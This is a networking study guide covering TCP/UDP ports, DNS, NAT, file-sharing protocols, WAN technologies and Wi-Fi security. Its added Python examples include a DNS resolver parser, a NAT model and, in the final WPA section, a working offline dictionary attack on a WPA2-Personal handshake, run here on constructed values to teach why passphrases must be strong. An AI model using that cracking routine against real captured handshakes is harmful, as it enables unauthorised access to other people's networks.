The Transmission Control Protocol (TCP) and the User Datagram Protocol (UDP) are the two transport protocols used to carry network data between server and client applications. The main difference between them is that TCP is connection-oriented, while UDP is connectionless. When TCP is used, a connection is first established between the two endpoints (the three-way handshake), and that connection stays open for the exchange of data until one side closes it.
A UDP sender, on the other hand, establishes no connection at all: it simply sends each datagram to the specified address and port, with no acknowledgement that it arrived. For some applications and services a TCP connection makes more sense, while others are served more efficiently by UDP. The advantage of TCP is reliability: sequence numbers and acknowledgement packets ensure that data arrives in order, and lost segments are detected and retransmitted. The advantage of UDP is that, with no connection setup and no acknowledgements, it has lower overhead and latency, at the cost of reliability. Neither protocol authenticates the source address in a packet, which is why connectionless UDP services are the usual vehicle for spoofing and reflection attacks. The table below lists some common TCP/IP applications with the well-known ports they use.
|Application||Port||Transport|
|FTP (File Transfer Protocol)||20, 21||TCP|
|SSH (Secure Shell)||22||TCP|
|SMTP (Simple Mail Transfer Protocol)||25||TCP|
|DNS (Domain Name System)||53||UDP and TCP|
|TFTP (Trivial File Transfer Protocol)||69||UDP|
|HTTP (Hypertext Transfer Protocol)||80||TCP|
|POP3 (Post Office Protocol version 3)||110||TCP|
|NNTP (Network News Transfer Protocol)||119||TCP|
|NTP (Network Time Protocol)||123||UDP|
|IMAP4 (Internet Message Access Protocol version 4)||143||TCP|
|HTTPS (Hypertext Transfer Protocol Secure)||443||TCP|
TCP/IP networks address hosts by their IP addresses. It would be very difficult to memorize the IP address of every host you want to connect to, so the Domain Name System (DNS) lets a host be identified by a domain name instead. A domain name uses words rather than numbers to identify Internet hosts. Suppose you want to connect to the CompTIA Web site with your Web browser. You would enter www.comptia.org in the address bar to go to the CompTIA Web page. www.comptia.org is the name that stands for a numerical IP address; you could use 18.104.22.168 instead, but www.comptia.org is easier to remember. A DNS server translates between the two. Your Web browser asks the TCP/IP stack's resolver to query a DNS server (UDP or TCP port 53) for the IP address of www.comptia.org; when the answer comes back, the browser connects to that address. Note that a plain DNS answer carries no authentication beyond a matching transaction ID and source port, which is what cache-poisoning attacks exploit; DNSSEC adds signatures to close that gap. Remember that DNS stands for Domain Name System (also written Domain Name Service) and that a DNS server translates domain names into their IP addresses.
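The exchange just described, as an added example that is not part of the original page: building the UDP query a resolver sends for www.comptia.org, and parsing a reply. The reply is constructed here rather than received from a real server, and the address in it is the example address used in the text; the transaction-ID check is the minimal validation a resolver must do before trusting an answer.

```python
# Added example (not from the original page): build the DNS query a resolver
# sends for www.comptia.org and parse a constructed reply (RFC 1035 wire format).
import struct

DNS_PORT = 53  # UDP and TCP port for DNS, as in the port table above

def encode_name(name: str) -> bytes:
    """Encode a dotted name as DNS labels: length byte + label, ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        if not 0 < len(label) < 64:
            raise ValueError("bad label length")
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def build_query(name: str, txid: int) -> bytes:
    """Standard query, recursion desired (flags 0x0100), one question of type A, class IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)

def read_name(msg: bytes, offset: int, depth: int = 0):
    """Decode a name at offset, following compression pointers (RFC 1035 4.1.4).
    Returns (name, offset just past the name as it appears in the stream)."""
    labels = []
    while True:
        length = msg[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0 == 0xC0:                 # two-byte compression pointer
            if depth > 10:
                raise ValueError("pointer loop")
            ptr = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            name, _ = read_name(msg, ptr, depth + 1)
            labels.append(name)
            return ".".join(labels), offset + 2
        offset += 1
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length

def parse_response(msg: bytes, expected_txid: int):
    """Return the A-record addresses in a response, rejecting answers whose
    transaction ID does not match the query we sent."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    if txid != expected_txid:
        raise ValueError("transaction ID mismatch")
    if not flags & 0x8000:
        raise ValueError("not a response")
    if flags & 0x000F:
        raise ValueError("server returned RCODE %d" % (flags & 0xF))
    offset = 12
    for _ in range(qd):                            # skip the echoed question(s)
        _, offset = read_name(msg, offset)
        offset += 4                                # QTYPE + QCLASS
    addrs = []
    for _ in range(an):
        _, offset = read_name(msg, offset)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rclass == 1 and rdlen == 4:   # A record, class IN
            addrs.append(".".join(str(b) for b in rdata))
    return addrs

def make_reply(query: bytes, addr: str, ttl: int = 300) -> bytes:
    """Constructed server reply for the example: echo the question, add one A record
    whose owner name is a pointer back to the question name at offset 12."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA set
    question = query[12:]
    answer = struct.pack("!H", 0xC00C)
    answer += struct.pack("!HHIH", 1, 1, ttl, 4) + bytes(int(x) for x in addr.split("."))
    return header + question + answer

if __name__ == "__main__":
    q = build_query("www.comptia.org", 0x1234)
    r = make_reply(q, "18.104.22.168")            # constructed reply, not a real lookup
    print(parse_response(r, 0x1234))
```

To run it against a real server you would send `build_query(...)` over a UDP socket to port 53 and feed the received bytes to `parse_response`, keeping the same transaction ID; the query and reply here are the same bytes that would cross the wire.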
NAT (Network Address Translation)
NAT translates one IP address to another. This can be a source address or a destination address. Two basic implementations of NAT can be used: static and dynamic.
With static NAT, an administrator manually configures the address translation device with a fixed one-to-one mapping between an inside address and a global address. Typically, static NAT is used to translate destination IP addresses in packets as they come into your network, so that an inside server is reachable from outside, but you can translate source addresses also.
With static address translation, you must build the translations by hand. If you have 1000 devices, you need 1000 static entries in the translation table, which is a lot of work. Static translation is therefore typically reserved for inside resources that outside users need to reach. When inside users access outside resources, dynamic translation is typically used. In this situation the global address assigned to an internal user is not important, because outside devices never initiate connections to your internal users; they only return traffic that the inside user requested, and the translation device forwards it using the table entry the outbound traffic created. A NAT device is not a firewall, though: unsolicited inbound traffic is dropped only because no table entry exists for it, not because of an access-control policy.
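The two translation modes above, as an added example that is not part of the original page: a small model of a NAT device with a hand-built static entry for an inside web server and dynamic entries created by outbound traffic. All addresses, ports and hosts are constructed for the example (RFC 5737 documentation ranges and RFC 1918 private space).

```python
# Added example (not from the original page): a simplified model of static and
# dynamic NAT. Addresses are constructed for the example.
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

Endpoint = Tuple[str, int]   # (ip, port)

@dataclass(frozen=True)
class Packet:
    src: Endpoint
    dst: Endpoint
    payload: str = ""

class Nat:
    def __init__(self, global_ip: str, pool_start: int = 40000):
        self.global_ip = global_ip
        self.next_port = pool_start
        # Static table, built by hand: one entry per published inside host.
        self.static_in: Dict[Endpoint, Endpoint] = {}    # global -> inside
        self.static_out: Dict[Endpoint, Endpoint] = {}   # inside -> global
        # Dynamic table, created by outbound traffic, keyed by (inside, outside peer).
        self.dyn_out: Dict[Tuple[Endpoint, Endpoint], Endpoint] = {}
        self.dyn_in: Dict[Endpoint, Tuple[Endpoint, Endpoint]] = {}  # global -> (inside, peer)

    def add_static(self, inside: Endpoint, global_port: int) -> None:
        g = (self.global_ip, global_port)
        self.static_in[g] = inside
        self.static_out[inside] = g

    def outbound(self, pkt: Packet) -> Packet:
        """Inside -> outside: rewrite the source to a global address and port."""
        g = self.static_out.get(pkt.src)
        if g is None:
            key = (pkt.src, pkt.dst)
            g = self.dyn_out.get(key)
            if g is None:                                # first packet of this flow
                g = (self.global_ip, self.next_port)
                self.next_port += 1
                self.dyn_out[key] = g
                self.dyn_in[g] = (pkt.src, pkt.dst)
        return Packet(src=g, dst=pkt.dst, payload=pkt.payload)

    def inbound(self, pkt: Packet) -> Optional[Packet]:
        """Outside -> inside: rewrite the destination back to the inside host.
        Returns None (drop) when no entry matches. A dynamic entry also requires
        the packet to come from the peer the inside host actually talked to."""
        inside = self.static_in.get(pkt.dst)
        if inside is None and pkt.dst in self.dyn_in:
            inside, peer = self.dyn_in[pkt.dst]
            if pkt.src != peer:
                return None
        if inside is None:
            return None
        return Packet(src=pkt.src, dst=inside, payload=pkt.payload)

def demo():
    nat = Nat("203.0.113.5")
    nat.add_static(("10.0.0.10", 80), 80)   # inside web server published on the global address

    # 1. An outside user reaches the published server through the static entry.
    hit = nat.inbound(Packet(("198.51.100.7", 51000), ("203.0.113.5", 80), "GET /"))

    # 2. An inside client connects out; a dynamic entry is created on the fly,
    #    and the server's reply is translated back using that entry.
    out = nat.outbound(Packet(("10.0.0.42", 55123), ("198.51.100.9", 443), "ClientHello"))
    back = nat.inbound(Packet(("198.51.100.9", 443), out.src, "ServerHello"))

    # 3. Unsolicited traffic to an unmapped global port, or to a dynamic port
    #    from a host other than the peer, has no entry and is dropped.
    stray = nat.inbound(Packet(("198.51.100.77", 9999), ("203.0.113.5", 22), "SSH-2.0-"))
    spoof = nat.inbound(Packet(("198.51.100.77", 443), out.src, "ServerHello"))
    return hit, out, back, stray, spoof

if __name__ == "__main__":
    for name, p in zip(("hit", "out", "back", "stray", "spoof"), demo()):
        print(name, p)
```

The peer check in `inbound` is the "address and port dependent filtering" behaviour of stricter NAT devices; many consumer devices accept a reply to a dynamic port from any outside host, which is what NAT hole-punching techniques rely on.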
ICS (Internet Connection Sharing)
ICS (Internet Connection Sharing) is a built-in feature of Windows 98 Second Edition, Windows 2000, Windows Me, and Windows XP. ICS lets networked computers share a single connection to the Internet: the sharing host performs NAT (together with a small DHCP allocator and DNS proxy) for the other machines, so multiple users can reach the Internet through one Dial-Up Networking or local network connection.
WINS (Windows Internet Name Service)
While DNS resolves host names to IP addresses, WINS resolves NetBIOS names to IP addresses. Windows Internet Name Service provides a dynamic database of NetBIOS-name-to-IP-address mappings. Determining the IP address associated with a particular computer name is called name resolution. WINS supports client and server computers running Windows. It uses a distributed database that is automatically updated with the names of computers currently available and the IP address assigned to each one. DNS is the alternative for name resolution; historically it suited computers with fixed IP addresses, because its records were maintained by hand, whereas WINS registrations are dynamic.
SNMP (Simple Network Management Protocol)
Simple Network Management Protocol is a TCP/IP protocol for monitoring networks and network components. SNMP uses small utility programs called agents to monitor behaviour and traffic on the network and gather statistical data. Agents can run on managed devices such as hubs, NICs, servers, routers, and bridges. The gathered data is stored in a MIB (management information base). To collect the information in a usable form, a management console polls these agents (UDP port 161) and downloads the information from their MIBs; agents can also send unsolicited traps to the console (UDP port 162). The data can then be displayed as graphs and charts or sent to a database program for analysis. Note that SNMPv1 and SNMPv2c authenticate with a community string sent in cleartext, and a write-enabled community string gives configuration control of the device, so use SNMPv3 with authentication and privacy, or at least restrict SNMP to a management network.
NFS (Network File System)
Network File System (NFS) is a distributed file system that allows users to access files and directories located on remote computers and treat them as if they were local. Classic NFS exports are access-controlled by client host or network address, and with the default AUTH_SYS security flavour the server trusts the user and group IDs the client asserts, so an export should be offered only to trusted hosts or secured with Kerberos (RPCSEC_GSS).
Zeroconf (Zero configuration)
Zero Configuration Networking is a set of techniques that automatically create a usable IP network without configuration or special servers. This allows users without networking knowledge to connect computers, networked printers, and other items together and expect them to work automatically. Without Zeroconf or something similar, a knowledgeable user must either set up special servers, such as DHCP and DNS, or configure each computer's network settings manually.
Zeroconf currently solves three problems:
- Choose numeric network addresses for networked items
- Figure out which computer has a certain name
- Figure out where to get services, like printing.
SMB (Server Message Block)
A file-sharing protocol designed to let networked computers transparently access files that reside on remote systems over a variety of networks. The SMB protocol defines a series of commands that pass information between computers, using four message types: session control, file, printer, and message. It is used mainly by computers running Microsoft Windows. SMB works on a client-server model, where a client makes specific requests and the server responds accordingly. One section of the protocol is specifically for filesystem access, so that clients can make requests of a file server. SMB was optimised for use on the local subnet, but it can be used to reach hosts on other subnets across the Internet, and SMB exposed in that way is the usual target of Windows file-and-print-sharing exploits, so it should not be reachable from untrusted networks. Client computers may have their own hard disks, which are not shared, yet also want access to the shared file systems and printers on the server, and it is for this primary purpose that SMB is best known and most heavily used.
AFP (Apple Filing Protocol)
The file-sharing protocol used in an AppleTalk network. For non-Apple systems to access data on an AppleShare server, their requests must be translated into AFP. AFP versions 3.0 and later rely exclusively on TCP/IP (AFP over TCP on port 548, with SLP on port 427 for service location), supporting AppleTalk only as a service discovery protocol. The AFP 2.x family supports both TCP/IP and AppleTalk for communication and service discovery.
LPD (Line Printer Daemon) and Samba
LPD is the primary UNIX printing protocol used to submit jobs to a printer. The LPR (client) component issues commands such as "print waiting jobs", "receive job", and "send queue state", and the LPD component on the print server (TCP port 515) responds to them. The most common implementations of LPD are the one in BSD UNIX and the LPRng project. The Common Unix Printing System (CUPS), which is more common on modern Linux distributions, borrows heavily from LPD. Unix and Mac OS X servers use the open-source Samba suite to provide Windows users with Server Message Block (SMB) file sharing.
WAN (Wide Area Networks) technologies:
Circuit-switched services provide a temporary connection across a phone circuit. In networking, these are typically used as backup for primary circuits and for temporary boosts of bandwidth.
A dedicated circuit is a permanent connection between two sites in which the bandwidth is reserved for that company's use. These circuits are common when a variety of services, such as voice, video, and data, must traverse the connection and you are concerned about delay and guaranteed bandwidth.
Cell-switched services can provide the same features that dedicated circuits offer. Their advantage over dedicated circuits is that a single device can connect to multiple devices over the same interface. The downside is that they are not available at all locations, they are difficult to set up and troubleshoot, and the equipment is expensive compared to that used for dedicated circuits.
Packet-switched services are similar to cell-switched services. Whereas cell-switched services switch fixed-length packets called cells, packet-switched services switch variable-length packets. This makes them better suited to data services, but they can nonetheless provide some of the QoS features that cell-switched services provide. Packet switching makes more efficient use of a telecommunication provider's bandwidth: the switches route each packet individually, switch to switch, over the best available path, so any one physical link can carry packets from many different senders to many different destinations, whereas in a circuit-switched connection the bandwidth is dedicated to one sender and receiver only.
ISDN (Integrated Services Digital Network)
Integrated Services Digital Network adapters can be used to send voice, data, audio, or video over standard telephone cabling. ISDN adapters must be connected directly to a digital telephone network. They are not actually modems, since they neither modulate nor demodulate: the ISDN signal is digital end to end. Like standard modems, ISDN adapters are available both as internal devices that connect to a computer's expansion bus and as external devices that connect to a serial or parallel port. ISDN throughput ranges from a single 64 Kbps B channel (56 Kbps on some switched circuits), through 128 Kbps for a Basic Rate Interface (two B channels plus a 16 Kbps D channel), up to 1.544 Mbps for a Primary Rate Interface carried on a T1 (23 B channels plus one D channel). ISDN hardware requires an NT (network termination) device, which converts network data signals into the signaling protocols used by ISDN. Sometimes the NT interface is integrated into ISDN adapters and ISDN-compatible routers; in other cases a separate NT device must be installed. ISDN is defined at the physical (I.430/I.431), data link (Q.921 LAPD), and network (Q.931 signaling) layers of the OSI model.
FDDI (Fiber Distributed Data Interface)
Fiber Distributed Data Interface shares many of the same features as Token Ring, such as token passing and a continuous network loop. FDDI has better fault tolerance, however, because its dual counter-rotating ring lets the ring reconfigure itself after a link failure. FDDI also has higher transfer speeds: 100 Mbps, compared to 4 to 16 Mbps for Token Ring. Unlike Token Ring, which is wired as a physical star, FDDI uses a physical ring. Each device in the ring attaches to the adjacent device with a two-strand fiber-optic cable. Data travels in one direction on the outer strand and in the other direction on the inner strand. When all devices attached to the dual ring are functioning properly, data travels on only one ring; FDDI transmits data on the second ring only in the event of a link failure.
|Media||MAC Method||Signal Propagation Method||Speed||Topologies||Maximum Connections|
|Fiber-optic||Token passing||Forwarded from device to device (or port to port on a concentrator) in a closed loop||100 Mbps||Dual ring; star via a concentrator||500 nodes|
T1 (T Carrier level 1)
A 1.544 Mbps point-to-point dedicated digital circuit provided by the telephone companies. T1 lines are widely used for private networks as well as for connecting an organization's LAN to the telco. A T1 line uses two pairs of wire, one to transmit and one to receive, and time division multiplexing (TDM) to interleave 24 64-Kbps voice or data channels. The standard T1 frame is 193 bits long: 24 8-bit samples (one per channel) plus one framing bit, with 8,000 frames transmitted per second (193 x 8,000 = 1,544,000 bits/s). T1 is not restricted to digital voice or to 64 Kbps data streams; channels may be combined, and the total 1.544 Mbps capacity can be broken up as required.
T3 (T Carrier level 3)
A T3 line is a high-speed connection carrying 44.736 Mbps (usually quoted as 45 Mbps). A T3 represents bandwidth equal to 28 T1s, or 672 voice-grade telephone channels, which is wide enough to carry real-time video and very large database transfers over a busy network. A T3 line is typically installed as a major networking artery for large corporations, for universities with high-volume network traffic, and for the backbones of the major Internet service providers.
OCx (Optical Carrier)
Optical Carrier (OC-n) designations specify the speed of fiber-optic links that conform to the SONET standard. The base rate, OC-1, is 51.84 Mbps, and OC-n runs at n times that: OC-3 at 155.52 Mbps, OC-12 at 622.08 Mbps, OC-48 at 2.488 Gbps.
X.25
X.25 is a network layer protocol that runs across both synchronous and asynchronous physical circuits, giving a lot of flexibility in connection options. X.25 was developed to run across unreliable media: it provides error detection and correction, as well as flow control, at both the data link layer (LAPB) and the network layer (X.25 itself). In this sense it performs a function similar to what TCP provides for IP at the transport layer. Because of its overhead, X.25 is best reserved for asynchronous, unreliable connections; if you have a synchronous digital connection, another protocol such as Frame Relay or ATM is much more efficient. An X.25 network transmits data with a packet-switching protocol that tolerates noisy telephone lines, relying on an elaborate worldwide network of packet-forwarding nodes that can participate in delivering an X.25 packet to its destination address.
Internet access technologies:
xDSL (Digital Subscriber Line)
xDSL is a collective term for the family of Digital Subscriber Line technologies. Some varieties are asymmetric, with different data rates downstream and upstream (ADSL, typically 1.5 to 8 Mbps downstream); others are symmetric, with the same rate in both directions (SDSL, for example 384 Kbps to 2 Mbps).
Asymmetric Digital Subscriber Line (ADSL)
A high-bandwidth digital transmission technology that uses existing phone lines and also allows voice transmissions over the same lines. Most of the traffic is transmitted downstream to the user, generally at rates of 512 Kbps to about 6 Mbps.
Broadband Cable (Cable modem)
Cable modems use a broadband connection to the Internet through cable television infrastructure. These modems use frequencies that do not interfere with television transmission.
POTS / PSTN
(Plain Old Telephone Service / Public Switched Telephone Network) POTS / PSTN access uses a modem, a device that makes it possible for computers to communicate over telephone lines. The word modem comes from Modulate and Demodulate. Because standard telephone lines carry analog signals and computers use digital signals, the sending modem must modulate its digital signals into analog signals, and the modem on the receiving end must then demodulate the analog signals back into digital signals. Modems can be external, connected to the computer's serial port by an RS-232 cable, or internal in one of the computer's expansion slots. Modems connect to the phone line using standard telephone RJ-11 connectors.
A wireless network consists of wireless NICs and access points. NICs come in different models including PC Card, ISA, PCI, etc. Access points act as wireless hubs to link multiple wireless NICs into a single subnet. Access points also have at least one fixed Ethernet port to allow the wireless network to be bridged to a traditional wired Ethernet network, such as the organization’s network infrastructure. Wireless and wired devices can coexist on the same network.
- WLAN (Wireless Local Area Network) A group of computers and associated devices that communicate with each other wirelessly.
- WPA (Wi-Fi Protected Access) A security protocol for wireless networks introduced to replace WEP. It keeps the RC4 cipher that WEP used (as TKIP) but derives a fresh key for every packet and adds a message integrity check, so the key no longer stays static as WEP's did. The changing per-packet key makes it much harder for an attacker to recover the key and gain access to the network. TKIP is itself deprecated today and should not be enabled where WPA2 or later is available.
- WPA2 (Wi-Fi Protected Access 2) The second generation of WPA. It replaces TKIP/RC4 with the Advanced Encryption Standard (AES) in CCMP mode, a stronger encryption mechanism that is a requirement for some government users.
- WPA-Personal (WPA-PSK) A version of WPA in which all stations share one pre-shared passphrase. The per-session and per-packet keys derived from it change constantly, but anyone who knows, or guesses, the passphrase can derive them too, so its strength rests entirely on the passphrase being long and unguessable.
- WPA-Enterprise A version of WPA that uses the same dynamic keys as WPA-Personal but authenticates each user or device individually, through an 802.1X authentication server (typically RADIUS) using EAP, so each station gets its own master key and individual credentials can be revoked.
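Why the WPA-Personal passphrase matters, as an added example that is not part of the original page: the passphrase is stretched into the Pairwise Master Key (PMK) with PBKDF2, the 4-way handshake derives the changing session key (PTK) from it, and message 2 of the handshake carries a MIC that an attacker can check offline against passphrase guesses. The SSID, MAC addresses, nonces, EAPOL frame and wordlist below are constructed for the example, not captured from a real network; the derivation itself follows IEEE 802.11i (WPA2 key descriptor version 2) and the PMK function is checked against the standard's published test vector.

```python
# Added example (not from the original page): WPA/WPA2-Personal key derivation
# and an offline dictionary attack against a constructed 4-way handshake.
import hashlib
import hmac

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("ascii"), 4096, 32)

def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..4, truncated to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(5)]
    return b"".join(blocks)[:64]

def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key: the per-association session key that 'changes' each time."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)

def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2) MIC over an EAPOL-Key frame whose MIC field is zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]

def crack(candidates, ssid, ap_mac, sta_mac, anonce, snonce, eapol, captured_mic):
    """Offline dictionary attack: recompute the MIC for each guess and compare with the capture."""
    for guess in candidates:
        try:
            pmk = wpa_pmk(guess, ssid)
        except ValueError:
            continue
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]   # KCK = first 16 bytes of the PTK
        if hmac.compare_digest(eapol_mic(kck, eapol), captured_mic):
            return guess
    return None

# Constructed handshake parameters (hypothetical network, not a real capture).
SSID = "ExampleNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 with the 16-byte MIC field zeroed:
# version, type, length | descriptor, key info, key length, replay counter,
# SNonce, key IV, key RSC, key ID, MIC (zeroed), key data length
EAPOL = bytes.fromhex("0103005f" "02" "010a" "0010") + bytes(8) + SNONCE + bytes(16 + 8 + 8 + 16 + 2)

def sniffed_mic(real_passphrase: str) -> bytes:
    """Stand-in for the MIC an attacker sniffs from message 2, computed here from the real passphrase."""
    kck = derive_ptk(wpa_pmk(real_passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL)

WORDLIST = ["letmein1", "sunshine", "password", "Tr0ub4dor&3"]   # constructed wordlist

def demo():
    """A dictionary-word passphrase falls to the wordlist; a long random one does not."""
    weak = crack(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL, sniffed_mic("password"))
    strong = crack(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL,
                   sniffed_mic("correct horse battery staple 2004"))
    return weak, strong

if __name__ == "__main__":
    print(wpa_pmk("password", "IEEE").hex())   # IEEE 802.11i Annex H test vector
    print(demo())
```

The 4096 PBKDF2 iterations slow each guess down, but they do not change the fact that the whole key hierarchy is a function of the passphrase plus values sent in the clear; WPA-Enterprise avoids this by deriving the PMK from an EAP exchange with the authentication server instead.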